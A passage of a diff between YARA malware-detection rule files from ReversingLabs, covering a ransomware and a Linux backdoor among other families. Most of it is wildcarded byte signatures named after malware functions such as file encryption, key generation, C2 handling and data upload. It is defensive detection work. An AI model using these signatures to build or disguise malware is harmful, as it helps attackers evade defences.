?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B + 44 96 ?? 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 8B 54 8E ?? 68 + ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 06 8D 50 ?? 8B FF 66 8B 08 83 + C0 ?? 66 3B CF 75 ?? 2B C2 D1 F8 57 8D 3C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB + ?? 8B 06 8D 50 ?? 66 8B 08 83 C0 ?? 66 3B CF 75 ?? 2B C2 D1 F8 6A ?? 8D 3C 45 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? A1 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 54 8E ?? 50 + 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 48 ?? EB ?? 33 C9 E8 ?? ?? ?? ?? 8B F8 56 + FF 15 ?? ?? ?? ?? 8B 4D ?? 8B C7 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 } - $encrypt_files_p2 = { - F4 33 C9 8D 84 24 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 89 5E ?? 89 64 24 ?? 66 89 4E ?? - 8D 50 ?? 90 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 94 24 ?? ?? ?? ?? 52 53 FF 15 ?? ?? ?? ?? - 85 C0 74 ?? 83 EC ?? 8B F4 33 C0 C7 46 ?? ?? ?? ?? ?? 89 5E ?? 66 89 46 ?? 8D 84 24 - ?? ?? ?? ?? 89 64 24 ?? 8D 50 ?? EB ?? 8D 49 ?? 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B - C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 8C 24 - ?? ?? ?? ?? 51 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? 8B F4 33 D2 C7 46 ?? ?? ?? - ?? ?? 89 5E ?? 8D 84 24 ?? ?? ?? ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? EB ?? 8D 49 ?? - 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? - ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 EC ?? 8B F4 33 D2 C7 46 ?? ?? - ?? ?? ?? 89 5E ?? 8D 44 24 ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? 8D A4 24 ?? ?? ?? ?? - 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 44 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? - ?? ?? ?? 53 6A ?? 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? - ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 EC ?? 8B F4 33 D2 C7 + $create_cab_file_and_upload_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? A1 ?? ?? ?? ?? 53 56 57 33 + FF 68 ?? ?? ?? ?? 8B F1 8D 95 ?? ?? ?? ?? 33 C9 57 52 89 85 ?? ?? ?? ?? 89 BD ?? ?? + ?? ?? 89 BD ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 66 89 + 85 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 33 D2 50 66 89 95 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 0F B7 8D ?? ?? ?? ?? 0F B7 95 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 51 0F B7 8D ?? + ?? ?? ?? 52 0F B7 95 ?? ?? ?? ?? 50 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 57 + 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 57 68 ?? ?? ?? ?? 8B C8 51 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 + FF 15 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B D8 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 + C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? + 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? + ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? + ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B CE 8D BD ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 F8 ?? 75 ?? 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 57 8D } - $encrypt_files_p3 = { - 46 ?? ?? ?? ?? ?? 89 5E ?? 8D 84 24 ?? ?? ?? ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? 90 - 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 44 24 ?? 50 53 6A ?? 53 53 53 68 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 ?? 51 FF 15 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B F8 53 - 57 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 54 - 24 ?? 52 57 8B CE E8 ?? ?? ?? ?? 8B 74 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 74 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 8B 8C 24 ?? ?? ?? ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? - ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 + $create_cab_file_and_upload_p2 = { + 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? EB ?? 33 FF 8D 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 74 ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? + ?? 8B B5 ?? ?? ?? ?? 83 C6 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 74 + ?? 56 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 3B + DF 74 ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? EB ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 3B + CF 75 ?? 2B C2 8D 93 ?? ?? ?? ?? D1 F8 8D 0C 00 33 C0 89 02 89 42 ?? 89 42 ?? 89 42 + ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? 3B CF 74 ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? 8B CB EB ?? 33 C9 8B 95 ?? ?? ?? ?? 89 8A ?? ?? ?? ?? 3B CF 0F 84 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8B + BD ?? ?? ?? ?? 8B 87 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 C7 87 ?? + ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8D 9B ?? ?? ?? ?? + 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D 84 46 ?? ?? ?? ?? 50 6A ?? 89 85 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? + 53 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 50 + 53 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? 51 03 C3 50 E8 ?? ?? ?? ?? + 8B BD ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 FB 83 C4 ?? 03 FE B9 ?? ?? ?? ?? BE ?? ?? ?? + ?? 50 F3 A5 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 E8 } - $generate_key = { - 50 C7 44 24 ?? ?? ?? ?? ?? F3 A5 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? - ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 44 24 ?? 8D 4C 24 ?? 51 - 6A ?? 6A ?? 6A ?? 8D 54 24 ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? - ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 6A ?? 8D 4C - 24 ?? 51 6A ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 8B 4C 24 - ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 6A ?? 8D 44 24 ?? 50 8D 4C 24 - ?? 51 6A ?? 52 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? - ?? ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 44 24 ?? C1 E8 ?? - 89 44 24 ?? 03 C3 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 5F 5E 5D B8 ?? ?? ?? - ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 53 55 56 E8 ?? ?? ?? ?? 8B - 4C 24 ?? 83 C4 ?? 89 5C 24 ?? 83 C3 ?? 53 8D 44 24 ?? 50 56 6A ?? 6A ?? 6A ?? 51 FF - 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? - ?? 83 C4 ?? C2 ?? ?? 8B 7C 24 ?? 8B 54 24 ?? 57 56 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 56 - 89 38 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 5F 5E 5D 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 83 - C4 ?? C2 + $create_cab_file_and_upload_p3 = { + 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 6A ?? + 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 57 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? + 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? + 6A ?? 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 50 05 ?? ?? ?? ?? 50 68 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? + 6A ?? 6A ?? 6A ?? 56 68 ?? ?? ?? ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 8B F0 85 F6 75 ?? 8B 95 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 52 FF D6 57 FF D6 B8 ?? ?? + ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 50 53 6A + ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 + 8B 35 ?? ?? ?? ?? FF D6 8B 8D ?? ?? ?? ?? 51 FF D6 57 FF D6 B8 ?? ?? ?? ?? 5F 5E 5B + 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 95 ?? + ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 + ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 50 FF D6 57 FF D6 B8 ?? ?? ?? ?? 5F 5E 5B 8B 4D + ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 + ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 8D ?? ?? ?? ?? 51 FF D6 57 FF D6 83 C8 } - $remote_connection = { - 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 57 8D 44 24 ?? 50 68 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 46 ?? 83 - F8 ?? 74 ?? 8B 46 ?? 8D 7E ?? 83 E8 ?? 83 78 ?? ?? 7E ?? 8B 48 ?? 51 8B CF E8 ?? ?? - ?? ?? 8B 3F 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 54 24 ?? 52 89 44 24 ?? FF 15 ?? ?? - ?? ?? 85 C0 75 ?? 8B 46 ?? 50 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 8B 8C 24 - ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 8B 48 ?? 8B 11 8B 02 0F B7 56 - ?? B9 ?? ?? ?? ?? 52 89 44 24 ?? 66 89 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 4E ?? 66 89 44 - 24 ?? 6A ?? 8D 44 24 ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 8B - 56 ?? 52 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 8B 8C 24 ?? ?? ?? ?? 33 CC E8 - ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 8B 8C 24 ?? ?? ?? ?? 5F 33 CC B8 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + $create_cab_file_and_upload_p4 = { + 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 40 50 6A ?? 89 85 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? + FF D6 8B 95 ?? ?? ?? ?? 52 FF D6 57 FF D6 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? + ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 50 6A ?? 53 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 + C4 ?? 8D 8D ?? ?? ?? ?? 51 52 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? + ?? FF D6 8B 85 ?? ?? ?? ?? 50 FF D6 57 FF D6 8B 4D ?? 8B 85 ?? ?? ?? ?? 5F 5E 33 CD + 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $cmd_expand_payload = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? 8B + D9 33 FF 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 33 D2 57 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D + ?? ?? ?? ?? 57 51 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? + 57 6A ?? 33 C0 68 ?? ?? ?? ?? 53 89 BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 57 57 57 6A ?? 57 56 FF + 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 75 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? 5F 5E 5B + 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 57 57 57 6A ?? 50 FF 15 ?? ?? ?? ?? 8B F8 + 85 FF 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 47 ?? 50 6A ?? 6A ?? FF 15 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? + ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 57 ?? 83 C4 ?? 57 89 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 8B 3D ?? ?? ?? ?? 50 FF D7 56 FF D7 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? + 51 E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? + ?? 83 C4 ?? 33 C0 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 50 50 68 ?? ?? ?? ?? 50 + 50 50 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 6A + ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 8B F0 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 FF D7 8B 4D ?? 8B 85 ?? ?? + ?? ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 } condition: - uint16(0)==0x5A4D and ($enum_shares) and ( all of ($find_files_p*)) and ($generate_key) and ( all of ($encrypt_files_p*)) and ($remote_connection) + uint16(0)==0x5A4D and ( all of ($network_communication_p*)) and ( all of ($handle_c2_commands_p*)) and ( all of ($create_cab_file_and_upload_p*)) and ($cmd_expand_payload) } -rule REVERSINGLABS_Win32_Ransomware_Hentaioniichan : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Linux_Backdoor_Linodas : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Hentai Oniichan ransomware." + description = "Yara rule that detects Linodas backdoor." author = "ReversingLabs" - id = "cd5e916f-7195-5bb6-abff-b08231053f9a" - date = "2021-03-05" - modified = "2021-03-05" + id = "2b197346-abce-5cff-938f-bb8742e03168" + date = "2024-05-22" + modified = "2024-05-22" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.HentaiOniichan.yara#L1-L140" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "153526e5a2f05bc8e3f77d83eefce6b4cd962ea093b6f1c0ab8fcabe8d8a7ad9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/Linux.Backdoor.Linodas.yara#L1-L216" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "12445771106e36b74b1ea292a8a25cab66bcaf0a08cf88d39a9f1bb13c6f525b" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "HentaiOniichan" + tc_detection_type = "Backdoor" + tc_detection_name = "Linodas" tc_detection_factor = 5 importance = 25 strings: - $find_files_p1 = { - 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53 - 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? - 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ?? - ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? - ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B - CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ?? - 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8 + $persistence_mechanism_ubuntu = { + 41 54 BE ?? ?? ?? ?? 55 53 48 81 EC ?? ?? ?? ?? 48 8D 6C 24 ?? 48 8D 54 24 ?? 48 89 + EF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 5C 24 ?? 48 + 89 EE 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 + 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 6C 24 ?? 48 8D 54 24 ?? BE ?? ?? ?? ?? 48 + 89 EF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 5C 24 ?? + 48 89 EE 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? + 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 5C 24 ?? 48 89 EE 48 89 DF E8 ?? ?? ?? + ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 41 BC ?? ?? ?? ?? 48 83 EB ?? 4C 39 E3 0F + 85 ?? ?? ?? ?? 4C 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 + E8 ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 + 74 ?? 48 8B 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 + 8D 5C 24 ?? 4C 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 + ?? ?? ?? ?? 48 89 DE 48 89 E7 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F + 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? BA + ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 5C 24 ?? 4C 8B 44 24 + ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE 48 + 89 E7 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? BE ?? ?? + ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? + ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? + 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 + 39 DC 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C C3 } - $find_files_p2 = { - 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 - ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? - ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? - 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? - ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? 